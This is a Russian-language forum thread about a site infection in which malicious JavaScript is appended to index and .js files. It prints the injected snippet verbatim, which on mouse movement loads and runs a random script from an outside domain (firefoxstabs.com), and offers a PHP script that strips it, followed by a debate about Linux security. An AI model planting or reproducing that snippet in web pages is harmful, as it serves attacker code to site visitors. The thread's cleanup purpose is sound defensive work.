Jump to content
Дизайн и модификация IPS Community IPBSkinsBETA
Search In
  • More options...
Find results that contain...
Find results in...
Sign in to follow this  
Qartvela™

вирус на FTP в index.* и *.JS файлах

Recommended Posts

добавляется в конце файла index.* & *.JS

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>
document.write('<scr'+'ipt src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js\"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});

 

мне это помогло, поможет и вам. :)

удаляет из index.* & *.JS вредоносный код

 

1) просканировать компьютер на вирусы

2) обязательно смените пароль на FTP

3) загрузить firefoxtabs_remover.php на FTP и запустите _http://yourdomain/firefoxtabs_remover.php

 

<?php 
define ('BR', "<br />\r\n"); 
$srch='<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript(\'http://firefoxstabs.com/\' + Math.random().toString().substring(3) + \'.js\', function() {flag = 2;});}});});</script>'; 
$srch2="document.write('<scr'+'ipt src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js\"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});"; 

function clean_file($file)
{ 
global $srch;
global $srch2; 
   $basename=basename($file); 
   $filename=substr($basename, 0, strrpos($basename, '.')); 
   //print($file.BR);

       $f_in=file_get_contents($file); 
       if (strpos($f_in, $srch)!=false) { 

             print("<b>".$file."</b><br>");
           $f_in=str_replace($srch, '', $f_in); 
           file_put_contents($file, $f_in); 
       } 
       if (strpos($f_in, $srch2)!=false) { 

           print("<b>".$file."</b><br>");

           $f_in=str_replace($srch2, '', $f_in); 
           file_put_contents($file, $f_in); 
       } 

} 

function firefoxtabs_remover($dir){ 
   if ($objs = glob($dir."/*")) { 
       foreach($objs as $obj) { 
           if (is_dir($obj)) firefoxtabs_remover($obj); 
           else clean_file($obj); 
       } 
   } 
} 

$dir=realpath('./'); 
firefoxtabs_remover($dir); 
?> 

firefoxtabs_remover.php

Edited by Qartvela™
  • Upvote 2

Share this post


Link to post
Share on other sites

Спасибо.

Тему закреплю пока. Уже обращались с такой проблемой.

Share this post


Link to post
Share on other sites

А вообще, большинству будет достаточно просто перезалить дистрибутив форума. Если никаких "модов", основанных на правке файлов, не ставили. И просто, и быстро, и полезно :)

Share this post


Link to post
Share on other sites

И просто, и быстро, и полезно

перезалить дистрибутив форума? :D

1) просканировать компьютер на вирусы

2) обязательно смените пароль на FTP

это не нужно делать?

достаточно просто перезалить дистрибутив форума

и это проще чем

3) загрузить firefoxtabs_remover.php на FTP и запустите _http://yourdomain/firefoxtabs_remover.php

:D

Share this post


Link to post
Share on other sites

Конечно, проще. Запустите этот скрипт на форуме, где больше 100Мб аттачей и вы поймете, о чем я. Не говоря уже о форумах, где аттачей под 3Тб. Ваш скрипт загружает в память по очереди абсолютно все файлы из каталога, включая и бинарные аттачи, а затем выполняет поиск по их содержимому. Наверное, это модно - гонять ресурсы сервера впустую. Но простая перезаливка дистрибутива - куда экономнее и быстрее, если ваш форум хоть чуть-чуть крупнее пустого форума на localhost.

 

А от вирусов помогает Linux. Как и от воровства паролей.

Share this post


Link to post
Share on other sites

А от вирусов помогает Linux. Как и от воровства паролей.

увы, но это уже давно не так

да, чистых вирусов (работоспособных) под *nix нет, но зато есть МАССА эксплойтов!

да и никакой линукс не спасет от криворукости админа!

Share this post


Link to post
Share on other sites
да, чистых вирусов (работоспособных) под *nix нет, но зато есть МАССА эксплойтов!

99,9% этих "эксплоитов" заключаются в получении локальным пользователем root-привилегий. Если вы единственный пользователь ПК, и вы не запускаете на локали публичных вебсервисов (а еще лучше, сидите за файрволом) - вам на 99,99% ничего не грозит (а я в этой теме говорю именно о десктопе, откуда и была утечка ftp-паролей).

 

В самом linux проблем нет, проблемы бывают в дополнительном ПО. Но, во-первых, вероятность "удачного сочетания" уязвимого ПО + незакрытой дыры в ядре на отдельно взятой системе с не отключенными регулярными обновлениями стремится куда-то в сторону минус бесконечности. Во-вторых, у любого приличного дистрибутива есть своя система проверенных репозиториев/пакетов с проверкой и регулярными обновлениями.

 

Ну а если пользователь качает неизвестные бинарники и запускает их под рутом... Согласен, идиота ничто не спасет. Вспоминается текстовый вирус в стиле "привет, я вирус! пожалуйста, разошлите этот текст всем знакомым и самостоятельно отформатируйте жесткие диски".

Share this post


Link to post
Share on other sites

99,9% этих "эксплоитов" заключаются в получении локальным пользователем root-привилегий. Если вы единственный пользователь ПК, и вы не запускаете на локали публичных вебсервисов (а еще лучше, сидите за файрволом) - вам на 99,99% ничего не грозит (а я в этой теме говорю именно о десктопе, откуда и была утечка ftp-паролей).

 

В самом linux проблем нет, проблемы бывают в дополнительном ПО. Но, во-первых, вероятность "удачного сочетания" уязвимого ПО + незакрытой дыры в ядре на отдельно взятой системе с не отключенными регулярными обновлениями стремится куда-то в сторону минус бесконечности. Во-вторых, у любого приличного дистрибутива есть своя система проверенных репозиториев/пакетов с проверкой и регулярными обновлениями.

 

Ну а если пользователь качает неизвестные бинарники и запускает их под рутом... Согласен, идиота ничто не спасет. Вспоминается текстовый вирус в стиле "привет, я вирус! пожалуйста, разошлите этот текст всем знакомым и самостоятельно отформатируйте жесткие диски".

 

в 99% случаев "root-привилегии" получают УДАЛЕННЫЕ пользователи, не имеющие физического доступа у компу

учитывая, что линукс это ТОЛЬКО ядро, дыры есть и в нём, иначе не было бы патчей, исправляющих проблемы с безопасностью!

и никакая "своя система проверенных репозиториев/пакетов" не застрахована от ошибок и проблем

Edited by muslimgauze

Share this post


Link to post
Share on other sites

Не буду более спорить, ибо оффтоп, да и ничего мы друг другу не докажем.

  • Upvote 1

Share this post


Link to post
Share on other sites

Не буду более спорить, ибо оффтоп, да и ничего мы друг другу не докажем.

у меня опыта с кривыми руками и *nix лет так 10-12

Share this post


Link to post
Share on other sites

А что делать, если яндекс ругается? Причем ему не нравятся именно файлы с базовыми скриптами движка? Там где графический редактор сообщений к примеру, или выпадающие меню? Хостеры не нашли никаких вирусов, посоветовали обращатся к разработчикам. Может у кого то еще такая проблема с 3.2.3?

Share this post


Link to post
Share on other sites

Если с скриптами все нормально и вы уверены что вирусов там нет, обращайтесь в яндекс.

Share this post


Link to post
Share on other sites

А что делать, если яндекс ругается?

Как показывает практика, Яндекс на вирусы ругается не просто так.

 

Хостеры не нашли никаких вирусов

:) А как они искали?

 

посоветовали обращатся к разработчикам.

Хороший совет.

 

Может у кого то еще такая проблема с 3.2.3?

Такой проблемы нет. Но если вы скачали форум с помойки, то там будет любая зараза.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...